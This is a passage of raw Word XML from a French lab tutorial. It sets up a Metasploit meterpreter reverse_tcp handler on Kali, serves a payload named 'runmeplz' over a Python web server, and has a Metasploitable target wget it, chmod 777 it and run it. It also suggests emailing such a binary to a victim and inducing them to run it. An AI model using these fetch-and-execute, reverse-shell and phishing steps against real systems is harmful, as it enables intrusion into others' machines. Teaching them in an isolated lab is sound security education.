      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>runmeplz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>doncfaisons</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en sorte que ce soit exécutable avec la commande suivante : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CBDB6E" w14:textId="77777777" w:rsidR="00AB7941" w:rsidRDefault="00AB7941" w:rsidP="004B5BDB"/>
    <w:p w14:paraId="4A8EBC68" w14:textId="4D19B237" w:rsidR="00AB7941" w:rsidRDefault="00AB7941" w:rsidP="00AB7941">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chmod 744 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>runmeplz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0694BF67" w14:textId="77777777" w:rsidR="00C928A1" w:rsidRDefault="00C928A1" w:rsidP="00AB7941">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D7059F9" w14:textId="77777777" w:rsidR="00C928A1" w:rsidRDefault="00AB7941" w:rsidP="00C928A1">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00AB7941">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FAD97C9" wp14:editId="6C7CDD7A">
            <wp:extent cx="6361846" cy="1057502"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="139608293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82934" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6513317" cy="1082680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62470AA8" w14:textId="2960EFCD" w:rsidR="006630F0" w:rsidRDefault="00C928A1" w:rsidP="00F21569">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>36</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="006630F0">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="665B680D" w14:textId="3E837E55" w:rsidR="00C928A1" w:rsidRDefault="006630F0" w:rsidP="00C928A1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00D566F6">
        <w:t>arfait. Maintenant lançons le mode d’écoute en le paramétrant avec les mêmes param</w:t>
      </w:r>
      <w:r w:rsidR="00F21569">
        <w:t>ètre</w:t>
      </w:r>
      <w:r w:rsidR="00D566F6">
        <w:t xml:space="preserve">s que ceux </w:t>
      </w:r>
      <w:r w:rsidR="00A74E3A">
        <w:t xml:space="preserve">que nous avons </w:t>
      </w:r>
      <w:r w:rsidR="00D566F6">
        <w:t>utilisé pour générer notre payload :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06111F8D" w14:textId="77777777" w:rsidR="00D566F6" w:rsidRDefault="00D566F6" w:rsidP="00D566F6">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56AF03BE" w14:textId="77777777" w:rsidR="00D566F6" w:rsidRPr="00D566F6" w:rsidRDefault="00D566F6" w:rsidP="00D566F6">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D566F6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/multi/handler </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132F6452" w14:textId="77777777" w:rsidR="00D566F6" w:rsidRPr="00D566F6" w:rsidRDefault="00D566F6" w:rsidP="00D566F6">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D566F6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">set payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D566F6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D566F6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D566F6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D566F6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D566F6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C285E88" w14:textId="77777777" w:rsidR="00D566F6" w:rsidRPr="00D566F6" w:rsidRDefault="00D566F6" w:rsidP="00D566F6">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D566F6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BF387C" w14:textId="77777777" w:rsidR="00D566F6" w:rsidRPr="00D566F6" w:rsidRDefault="00D566F6" w:rsidP="00D566F6">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D566F6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">set LHOST ____.____.____.____ #IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D566F6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attaquant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D566F6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (kali)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E6C5E9" w14:textId="77777777" w:rsidR="00D566F6" w:rsidRPr="00D566F6" w:rsidRDefault="00D566F6" w:rsidP="00D566F6">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D566F6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>show info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554365D1" w14:textId="77777777" w:rsidR="00D566F6" w:rsidRDefault="00D566F6" w:rsidP="00D566F6">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D566F6">
        <w:t>exploit -j -z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D58436" w14:textId="77777777" w:rsidR="00D566F6" w:rsidRDefault="00D566F6" w:rsidP="00D566F6">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37BD44FE" w14:textId="77777777" w:rsidR="006630F0" w:rsidRDefault="006630F0" w:rsidP="006630F0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="006630F0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61CCEC0A" wp14:editId="18208EE7">
            <wp:extent cx="6272965" cy="3056964"/>
            <wp:effectExtent l="0" t="0" r="1270" b="3810"/>
            <wp:docPr id="153292084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20843" name="Image 1" descr="Une image contenant texte, capture d’écran&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6293599" cy="3067020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6AB8C1" w14:textId="0D04610F" w:rsidR="00D566F6" w:rsidRDefault="006630F0" w:rsidP="006630F0">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>37</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7592D902" w14:textId="77777777" w:rsidR="006630F0" w:rsidRPr="006630F0" w:rsidRDefault="006630F0" w:rsidP="006630F0"/>
    <w:p w14:paraId="7550D537" w14:textId="77777777" w:rsidR="004A490F" w:rsidRDefault="00BA45D6" w:rsidP="004A490F">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00BA45D6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32F1E289" wp14:editId="15D7780D">
            <wp:extent cx="6112684" cy="941294"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="62596931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69319" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6189883" cy="953182"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="016C802A" w14:textId="3D166FFD" w:rsidR="00D566F6" w:rsidRDefault="004A490F" w:rsidP="004A490F">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>38</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="037B01AE" w14:textId="77777777" w:rsidR="00BA45D6" w:rsidRDefault="00BA45D6" w:rsidP="00C928A1"/>
    <w:p w14:paraId="286BD408" w14:textId="77777777" w:rsidR="00BA45D6" w:rsidRDefault="00BA45D6">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D281D8" w14:textId="56CC2830" w:rsidR="000223A0" w:rsidRDefault="00BA45D6" w:rsidP="00C928A1">
      <w:r w:rsidRPr="00BA45D6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Vérifiez que votre machine écoute sur le port </w:t>
      </w:r>
      <w:r w:rsidRPr="000223A0">
        <w:rPr>
          <w:rStyle w:val="SansinterligneCar"/>
        </w:rPr>
        <w:t>4444</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA45D6">
        <w:t xml:space="preserve"> avec la commande </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000223A0">
        <w:rPr>
          <w:rStyle w:val="SansinterligneCar"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>ss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000223A0">
        <w:rPr>
          <w:rStyle w:val="SansinterligneCar"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000223A0">
        <w:rPr>
          <w:rStyle w:val="SansinterligneCar"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>ant</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA45D6">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA45D6">
        <w:t xml:space="preserve"> Nous voilà prêt à recevoir une connexion en provenance de la victime</w:t>
      </w:r>
      <w:r w:rsidR="000223A0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2610B739" w14:textId="77777777" w:rsidR="000223A0" w:rsidRDefault="000223A0" w:rsidP="00C928A1"/>
    <w:p w14:paraId="5C84CE62" w14:textId="20620DE4" w:rsidR="000223A0" w:rsidRDefault="000223A0" w:rsidP="00C928A1">
      <w:r>
        <w:t>Utilisons la commande</w:t>
      </w:r>
      <w:r w:rsidR="00B302ED">
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333FA4A5" w14:textId="77777777" w:rsidR="000223A0" w:rsidRDefault="000223A0" w:rsidP="00BA45D6">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04237531" w14:textId="286AB9CD" w:rsidR="00BA45D6" w:rsidRDefault="00A74A85" w:rsidP="00BA45D6">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00BA45D6">
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BA45D6">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BA45D6">
        <w:t>ant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="172E3DC2" w14:textId="77777777" w:rsidR="00C928A1" w:rsidRPr="00C928A1" w:rsidRDefault="00C928A1" w:rsidP="00C928A1"/>
    <w:p w14:paraId="54665B9E" w14:textId="77777777" w:rsidR="00C928A1" w:rsidRDefault="00C928A1" w:rsidP="00AB7941">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BD85B26" w14:textId="77777777" w:rsidR="000223A0" w:rsidRDefault="00BA45D6" w:rsidP="000223A0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00BA45D6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F817F5F" wp14:editId="762958D8">
            <wp:extent cx="6392579" cy="2097741"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="129082430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4308" name="Image 1" descr="Une image contenant texte, capture d’écran&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6413759" cy="2104691"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2069D762" w14:textId="50C9A121" w:rsidR="00C928A1" w:rsidRDefault="000223A0" w:rsidP="000223A0">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>39</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : Nous pouvons bien voir que notre machine écoute sur le port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0655E6E6" w14:textId="77777777" w:rsidR="000223A0" w:rsidRDefault="000223A0" w:rsidP="000223A0"/>
    <w:p w14:paraId="2C6BBC1D" w14:textId="77777777" w:rsidR="00F822CD" w:rsidRDefault="00F822CD" w:rsidP="00F822CD">
      <w:r w:rsidRPr="00F822CD">
        <w:t xml:space="preserve">Déployez/Copiez et lancez le payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F822CD">
        <w:t>runmeplz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F822CD">
        <w:t xml:space="preserve"> sur la machine cible (par le moyen de votre choix). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D74C9D" w14:textId="77777777" w:rsidR="00F822CD" w:rsidRPr="00F822CD" w:rsidRDefault="00F822CD" w:rsidP="00F822CD"/>
    <w:p w14:paraId="3C1C5E15" w14:textId="77777777" w:rsidR="00F822CD" w:rsidRPr="00F822CD" w:rsidRDefault="00F822CD" w:rsidP="00F822CD">
      <w:r w:rsidRPr="00F822CD">
        <w:t xml:space="preserve">En pratique </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F822CD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>runmeplz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F822CD">
        <w:t xml:space="preserve"> pourrait être envoyé par email en pièce jointe à la victime. Puis vous inciteriez la victime à exécuter ce binaire sur son poste de travail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE90D08" w14:textId="77777777" w:rsidR="000223A0" w:rsidRPr="000223A0" w:rsidRDefault="000223A0" w:rsidP="000223A0"/>
    <w:p w14:paraId="2399EE98" w14:textId="0BD65631" w:rsidR="004B5BDB" w:rsidRDefault="009E31CB" w:rsidP="004B5BDB">
      <w:r>
        <w:t>Moyen que nous allons utiliser : Méthode vie un serveur http de notre Kali vers le Metasploitable :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3355AF" w14:textId="77777777" w:rsidR="009E31CB" w:rsidRDefault="009E31CB" w:rsidP="004B5BDB"/>
    <w:p w14:paraId="4683B97D" w14:textId="3B96F43E" w:rsidR="009E31CB" w:rsidRDefault="00261469" w:rsidP="004B5BDB">
      <w:r>
        <w:t>Démarrons premièrement un serveur web sur Kali</w:t>
      </w:r>
      <w:r w:rsidR="00B149BD">
        <w:t xml:space="preserve"> avec la commande</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515C55CF" w14:textId="77777777" w:rsidR="00B149BD" w:rsidRDefault="00B149BD" w:rsidP="004B5BDB"/>
    <w:p w14:paraId="03A5E3C5" w14:textId="35573F10" w:rsidR="00B149BD" w:rsidRDefault="00B149BD" w:rsidP="00B149BD">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r w:rsidRPr="00B149BD">
        <w:t xml:space="preserve">python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B149BD">
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B149BD">
        <w:t xml:space="preserve"> 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2670884E" w14:textId="77777777" w:rsidR="00AC6F04" w:rsidRDefault="00AC6F04" w:rsidP="00B149BD">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3579FE9D" w14:textId="77777777" w:rsidR="00AC6F04" w:rsidRDefault="00AC6F04" w:rsidP="00AC6F04">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00AC6F04">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AC32A0E" wp14:editId="1D553B81">
            <wp:extent cx="6318998" cy="654050"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="3005510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51064" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6696673" cy="693141"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E234939" w14:textId="3A16ACFF" w:rsidR="00AC6F04" w:rsidRDefault="00AC6F04" w:rsidP="00AC6F04">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : démarrage du serveur </w:t>
      </w:r>
      <w:r w:rsidR="006215B7">
        <w:t>web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE5BC19" w14:textId="77777777" w:rsidR="006215B7" w:rsidRDefault="006215B7" w:rsidP="006215B7"/>
    <w:p w14:paraId="60EE6F2C" w14:textId="48ACF688" w:rsidR="006215B7" w:rsidRDefault="006215B7" w:rsidP="006215B7">
      <w:r>
        <w:t xml:space="preserve">Maintenant, on va télécharger et exécuter le fichier dans notre </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> avec la commande : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2C0A6A" w14:textId="77777777" w:rsidR="006215B7" w:rsidRPr="006215B7" w:rsidRDefault="006215B7" w:rsidP="006215B7">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006215B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006215B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://&lt;IP_Kali&gt;:8000/runmeplz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679862B1" w14:textId="694D17E5" w:rsidR="006215B7" w:rsidRPr="006215B7" w:rsidRDefault="006215B7" w:rsidP="006215B7">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006215B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>777</w:t>
      </w:r>
      <w:r w:rsidRPr="006215B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006215B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>runmeplz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E05B233" w14:textId="5C0F0680" w:rsidR="006215B7" w:rsidRPr="006215B7" w:rsidRDefault="006215B7" w:rsidP="006215B7">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>runmeplz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="701F8429" w14:textId="77777777" w:rsidR="006215B7" w:rsidRDefault="00B149BD" w:rsidP="006215B7">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00B149BD">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D23366E" wp14:editId="6DD2A544">
            <wp:extent cx="5760720" cy="3424555"/>
            <wp:effectExtent l="0" t="0" r="5080" b="4445"/>
            <wp:docPr id="174377178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71786" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="3424555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75608567" w14:textId="4BB3C5DF" w:rsidR="00B149BD" w:rsidRDefault="006215B7" w:rsidP="006215B7">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
